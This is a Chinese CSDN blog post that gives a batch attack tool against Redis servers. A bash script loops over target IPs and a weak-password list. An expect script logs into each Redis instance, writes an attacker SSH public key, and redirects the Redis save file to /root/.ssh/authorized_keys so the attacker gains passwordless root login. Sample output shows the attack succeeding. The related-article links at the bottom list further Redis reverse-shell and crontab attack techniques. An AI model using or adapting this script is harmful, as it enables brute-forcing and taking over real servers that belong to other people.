shell脚本实现批量自动redis反弹shell攻击

最新推荐文章于 2023-12-29 08:43:57 发布
最新推荐文章于 2023-12-29 08:43:57 发布
阅读量1.4k 收藏 3
点赞数
分类专栏: Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32642039/article/details/79806199
版权

一、shell实现redis反弹shell

[root@xingcheng attack]# cat shell_rebound.sh
#!/bin/bash
##create by xingcheng
##20180403
##function 批量redis反弹shell获取系统权限,主要针对没有安全策略的reids服务器和弱口令redis服务器,他们往往使用root账户运行

#ip_list=(39.106.107.229 123.206.31.161 127.0.0.1)
#password_dict=(123456 abcdef 234rdffs)
ip_list=(127.0.0.1 192.168.0.1) #ip列表数组,可以批量存入ip
password_dict=(123456 abcdefg 1qaz2wsx) #弱口令数组




password(){
for passwd in ${password_dict[@]}
do
  expect shell_rebound.exp "$ip" "$passwd"
  echo $(cat /root/.ssh/authorized_keys)
done

}




ip(){
for ip in ${ip_list[@]}
do
  password
done
}

ip

[root@xingcheng attack]# cat shell_rebound.exp 
#!/usr/bin/expect

set sentence1 [lindex $argv 0]
set sentence2 [lindex $argv 1]
spawn /usr/local/redis/bin/redis-cli -h $sentence1 -p 6379 -a $sentence2

expect  "127.0.0.1:6379>"
if { $sentence1==$sentence1 } {
send "set -.- \"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAltEC9ktb+401+epwi/QxYKoTLYiHaJ9RREnHzPfMzs107ba9otiT6iiiFDJtXnvAWkp6vMDJ59ncJUNCFmPjReK521DP5cmVg5V7un71GhFEybZ8oGzEFWeYPhXp+vBK0VW1btPl7GaLs5DU1bKDpmPPFURWFIw77pd8CFeYXjLBssmQgvm3szk2VxD2gw2DAQa6+cLGtjRMmWgD2QRG7gkMoRotkfoxkqwESuBedspm0unB7eQHfXvMznntnwTzwDW1E70BMAvk4bnoJnBGnZep2SBxNUn9H6a7mcGyD6FDQ6TQClc9KeXNiq/mqTa0X6jCLzF0GsYl0mQHcAF7DQ== rsa-key-20180320\n\n\n\" \r"
send "config set dir /root/.ssh \r"
send "config set dbfilename authorized_keys \r"
send "save \r"
}


expect eof

成功的效果,免密码登陆服务器成功。

[root@xingcheng attack]# cat /root/.ssh/authorized_keys
REDIS0008   redis-ver4.0.6
redis-bits����e.used-mem¸þ

                        ��preamble~��-A 


ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAltEC9ktb+401+epwi/QxYKoTLYiHaJ9RREnHzPfMzs107ba9otiT6iiiFDJtXnvAWkp6vMDJ59ncJUNCFmPjReK521DP5cmVg5V7un71GhFEybZ8oGzEFWeYPhXp+vBK0VW1btPl7GaLs5DU1bKDpmPPFURWFIw77pd8CFeYXjLBssmQgvm3szk2VxD2gw2DAQa6+cLGtjRMmWgD2QRG7gkMoRotkfoxkqwESuBedspm0unB7eQHfXvMznntnwTzwDW1E70BMAvk4bnoJnBGnZep2SBxNUn9H6a7mcGyD6FDQ6TQClc9KeXNiq/mqTa0X6jCLzF0GsYl0mQHcAF7DQ== rsa-key-20180320
十月鱼
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全——利用ssrf操作内网redis写入计划任务反弹shell
Demo不是emo的博客
09-17 3376
今天的内容是ssrf漏洞的利用,环境选择的是discuz含有ssrf漏洞的版本,通过该漏洞来写入redis计划任务反弹shell(附带环境安装包)
SSRF——手把手教你Redis反弹Shell
sudu2020dd的博客
06-04 2954
由于业务运行的服务器处于内外网边界,并且可通过利用当前的这台服务器,根据所在的网络,访问到与外部网络隔离的内网应用,所以一般情况下,SSRF漏洞的攻击目标是攻击者无法直接访问的内网系统。因为攻击Redis A之前,首先需要构造一个样本,如何构造,通过在kali本地搭建一个Redis B,作为本地测试,形成攻击链后将他的格式转换为gopher协议,然后测试完毕后,应用在真实攻击上,将gopher协议数据包发送给存在SSRF漏洞的机器实现攻击,转给Redis A,写一个计划任务,反弹shell,往kali弹。
从0到1浅析Redis服务器反弹Shell那些事
最新发布
道阻且长,行则将至。
12-29 2293
本文学习了 Redis 服务的作用,并本地搭建了 Redis 服务,同时介绍了其相关基础使用方法和核心安全配置。然后总结分析了 Redis 未授权访问漏洞或弱口令导致 Redis 服务被攻击者操控后,如何进一步通过反弹 Shell 接管服务器。
Redis未授权漏洞复现,利用其实现的挖矿蠕虫脚本分析
qq_53689523的博客
05-05 851
Redis未授权漏洞复现 挖矿蠕虫脚本分析 恶意代码分析实例
redis未授权访问反弹shell
18年3月萌新白帽子
06-26 4559
一、redis的安装1.使用wget命令获取redis的安装包wget http://download.redis.io/releases/redis-4.0.8.tar.gz2.tar –zxvf redis-4.0.8.tar.gz解压改文件然后进入redis-4.0.8这个文件夹   cd redis-4.0.8然后执行make命令由于我们刚刚安装好redis数据库,还未创建用户,默认使用的...
shell脚本批量删除redis数据.txt
08-29
linux系统下,模糊匹配,可批量删除redis的key,修改ip即可使用。试用场景:redis内存爆满、redis不能定时清理数据等。
自动化部署Redis Shell脚本
01-04
为了实现自动化部署,我们可以编写一个Shell脚本,例如`install_redis.sh`: ```bash #!/bin/bash # 安装依赖 sudo apt-get update sudo apt-get install -y build-essential # 下载Redis源码 wget ...
CentOS下redis自启动shell脚本
09-10
在CentOS操作系统中,为了实现Redis数据库的自动化管理,通常需要创建一个自启动的shell脚本,以便在系统启动时自动启动Redis服务,并提供停止、重启等操作。本文将详细介绍如何创建这样一个脚本以及相关的配置步骤...
一键shell脚本搭建docker redis 集群(cluster)
12-30
为了新手小伙伴发愁集群创建难,特意写了一个shell脚本。自己技术也很菜,但是我坚信也会有跟我一样菜的小伙伴。。。。哈哈哈 不多说直接上脚本 希望有大神更加优化一下,优化后的版本可以分享下。哇 等着你大神,...
快速搭建redisshell脚本
01-17
快速搭建redisshell脚本,包括单机,主备,原生集群,codis集群 使用环境为Linux,需要能编译redis源码 redis版本为5.0.3,codis版本为3.2.2
Redis-Getshell:Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell
05-05
Redis-Getshell 其中的p参数为了区别端口P我将其改成了a Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell Usage:python3 RedisGetshell.py -H 127.0.0.1 -P 6379 还可以更完善的,后面有时间了就修改哈! Webshell SSH crontab
Spring cloud function SpEL RCE批量检测脚本反弹shell脚本
03-30
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 批量检测脚本:python Spel_RCE_POC.py url.txt 反弹shell脚本:python Spel_RCE_Bash_EXP.py url lhost lport 受影响版本:3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
redis 未授权访问配合计划任务反弹shell
m0_65096687的博客
05-23 1326
(1)redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网;(2)没有设置密码认证(一般为空),可以免密码远程登录redis服务。然后直接本地开个nc。
redis未授权反弹shell
weixin_34235371的博客
05-15 194
rt发现一处redis未授权,进行反弹shell。输入反弹命令:主机监听端口:反弹成功。 转载于:https://blog.51cto.com/13539934/2395206
Redis未授权访问漏洞之反弹连接,SSH Key免密登陆,Webshell提权
qq_60115503的博客
05-10 815
Redis简介 REmote DIctionary Server(Redis)是一个由Salvatore Sanfilippo写的key-value存储系统,是跨平台的非关系型数据库(端口:6379) 存储缓存用的数据 需要高速读/写的场合使用它快速读/写 外网Redis配置 找到redis中的redis.cof文件并打开: 修改protectd-mode为no 将#bind 127.0.0.1修改为bind 127.0.0.1 修改daemonize属...
[Shell]Redis未授权访问反弹shell
baguangman5501的博客
09-08 479
原作者:Cream 文章出处: 贝塔安全实验室 0x01 Redis未授权访问反弹shell Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。 Redis因配置不当可以未授权...
网络安全——redis未授权访问漏洞写入计划任务反弹shell
Demo不是emo的博客
09-17 5682
redis的未授权访问漏洞,顾名思义,就是不需要输入账密就可以直接登录(含redis服务安装包分享),本文介绍了怎么利用该漏洞获取目标shell
2021-8-1Redis计划任务反弹shell
qq_45290991的博客
08-01 2228
前段时间忙着毕业,终于现在毕业了,在愉快而紧张地等待毕业前期,我开始了Redis的学习。。。 一、搭建安装配置Redis数据库 我听说在centOS下可以Redis结合计划任务反弹shell成功,Ubuntu貌似不行 ...
利用redis漏洞反弹shell
qq_54713392的博客
04-20 2129
利用redis漏洞反弹shell 攻击机:kali 192.168.32.132 目标机:centos7 192.168.32.144 (1)在目标机centos中安装redis服务器(redis-server) 解压,进入源码目录,然后编译(make、make install) 解压文件:tar -zxvf redis-2.8.17.tar.gz 移动解压文件 执行命令:mv redis-2.8.17 /usr/local/redis 进入到目录下:cd /usr/local/redis 执行ma
shell脚本批量删除redis数据
12-20
以下是一个使用shell脚本批量删除redis数据的例子: ```shell redis-cli keys "*" | xargs redis-cli del ``` 这个命令会使用redis-cli的keys命令获取所有的key,然后使用xargs命令将这些key作为参数传递给redis-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值